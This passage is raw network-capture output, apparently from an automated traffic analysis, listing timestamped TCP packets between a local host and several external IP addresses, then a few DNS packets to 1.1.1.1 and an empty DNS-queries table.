                                                                                                                                                                  Dec 18, 2024 11:09:48.760668993 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.760687113 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.760696888 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.760713100 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.760726929 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.761698961 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.761712074 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.761723042 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.761742115 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.761758089 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.763504982 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.763545990 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.763654947 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.763665915 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.763675928 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.763694048 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.763715029 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.764538050 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.764576912 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.765616894 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.765630007 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.765642881 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.765655994 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.765670061 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.766822100 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.766840935 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.766865969 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.766887903 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.768074036 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.768089056 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.768114090 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.768127918 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.770519018 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.770530939 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.770561934 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.835135937 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.835180044 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.835238934 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.835263968 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.835444927 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.835480928 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.835486889 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.835540056 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.836183071 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.836225033 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.836607933 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.836644888 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.837657928 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.837697029 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.838092089 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.838135004 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.838840008 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.838851929 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.838895082 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.838912964 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.839413881 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.839472055 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.839607954 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.839719057 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.840666056 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.840677977 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.840842962 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.841476917 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.841491938 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.841526031 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.841552973 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.842533112 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.842576981 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.843360901 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.843403101 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.843498945 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.843512058 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.843544960 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.844628096 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.844640017 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.844680071 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.846424103 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.846435070 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.846446037 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.846467972 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.846481085 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.847342968 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.847384930 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.860735893 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.860749006 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.860791922 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.861016989 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.861028910 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.861059904 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.861629009 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.861673117 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.862544060 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.862555027 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.862565994 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.862586975 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.862613916 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.863495111 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.863540888 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.863796949 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.863837004 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.864625931 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.864669085 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.865683079 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.865716934 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.865727901 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.865750074 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.865772963 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.866910934 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.866921902 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.866957903 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.867494106 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.867535114 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.868309021 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.868350983 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.869501114 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.869513035 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.869523048 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.869544983 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.869565964 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.870629072 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.870640039 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.870651007 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.870676994 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.870696068 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.872608900 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.872620106 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.872631073 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.872653008 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.872673035 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.873056889 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.873099089 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.874136925 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.874147892 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.874181032 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.875374079 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.875385046 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.875461102 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.876749039 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.876760960 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.876773119 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.876796961 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.876815081 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.877856016 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.877866983 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.877877951 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.877904892 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.877928972 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.878868103 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.878909111 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.879192114 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.879232883 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.879873037 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.879915953 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.880143881 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.880184889 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.880892038 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.880933046 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.880994081 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.881031036 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.881972075 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.882014036 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.882314920 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.882354021 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.882947922 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.882988930 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.883052111 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.883090019 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.883963108 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.884006977 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.884407997 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.884448051 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.885628939 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.885675907 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.885936975 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.885977030 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.887223005 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.887234926 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.887267113 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.887281895 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.888366938 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.888376951 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.888387918 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.888410091 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.888432026 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.889431000 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.889442921 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.889452934 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.889476061 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.889497042 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.891202927 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.891213894 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.891226053 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.891237020 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.891251087 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.891274929 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.892312050 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.892323017 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.892353058 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.892374039 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.893394947 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.893438101 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.894288063 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.894330025 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.894488096 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.894500017 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.894526005 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.894541979 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.895272017 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.895317078 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.895493984 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.895534039 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.896365881 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.896406889 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.897095919 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.897138119 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.897361994 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.897403955 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.897547960 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.897586107 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:48.898629904 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:48.898674011 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:49.115773916 CET44349959172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:49.115865946 CET44349959172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:49.115914106 CET49959443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:49.116013050 CET49959443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:49.116033077 CET44349959172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:49.279011965 CET49980443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:49.279055119 CET44349980172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:49.279112101 CET49980443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:49.279434919 CET49980443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:49.279448032 CET44349980172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:50.491605043 CET44349980172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:50.491708040 CET49980443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:50.508055925 CET49980443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:50.508088112 CET44349980172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:50.508287907 CET44349980172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:50.509412050 CET49980443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:50.509543896 CET49980443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:50.509568930 CET44349980172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:50.509623051 CET49980443192.168.2.6172.67.179.109
                                                                                                                                                                  Dec 18, 2024 11:09:50.509632111 CET44349980172.67.179.109192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:51.128348112 CET4996180192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:51.128655910 CET4998580192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:51.248285055 CET8049985185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:51.248301029 CET8049961185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:51.248496056 CET4996180192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:51.248509884 CET4998580192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:51.248774052 CET4998580192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:51.369512081 CET8049985185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:52.583348989 CET8049985185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:52.583400011 CET4998580192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:54.204250097 CET4998580192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:54.204627037 CET4999480192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:54.324327946 CET8049994185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:54.324414015 CET4999480192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:54.324561119 CET8049985185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:54.324601889 CET4999480192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:54.324630022 CET4998580192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:54.444123030 CET8049994185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:55.668965101 CET8049994185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:55.670684099 CET4999480192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:56.629590988 CET44349971104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:56.629703999 CET44349971104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:56.629846096 CET49971443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:56.629846096 CET49971443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:56.798902988 CET50000443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:56.798954010 CET44350000104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:56.799014091 CET50000443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:56.799679995 CET50000443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:56.799693108 CET44350000104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:57.641715050 CET4999480192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:57.642047882 CET5000380192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:57.761645079 CET8050003185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:57.761739016 CET8049994185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:57.761862993 CET4999480192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:57.762070894 CET5000380192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:57.762070894 CET5000380192.168.2.6185.215.113.43
                                                                                                                                                                  Dec 18, 2024 11:09:57.881562948 CET8050003185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:58.015664101 CET44350000104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:58.015741110 CET50000443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:58.020857096 CET50000443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:58.020863056 CET44350000104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:58.021128893 CET44350000104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:58.025566101 CET50000443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:58.025738001 CET50000443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:58.025768995 CET44350000104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:58.026510000 CET50000443192.168.2.6104.21.23.76
                                                                                                                                                                  Dec 18, 2024 11:09:58.067325115 CET44350000104.21.23.76192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:59.105633974 CET8050003185.215.113.43192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:59.105690002 CET5000380192.168.2.6185.215.113.43

                                                                                                                                                                  UDP Packets

                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Dec 18, 2024 11:09:17.031543016 CET5201453192.168.2.61.1.1.1
                                                                                                                                                                  Dec 18, 2024 11:09:17.251812935 CET53520141.1.1.1192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:17.256336927 CET5453353192.168.2.61.1.1.1
                                                                                                                                                                  Dec 18, 2024 11:09:17.575562954 CET53545331.1.1.1192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:23.382252932 CET5994153192.168.2.61.1.1.1
                                                                                                                                                                  Dec 18, 2024 11:09:23.697999001 CET53599411.1.1.1192.168.2.6

                                                                                                                                                                  DNS Queries

                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
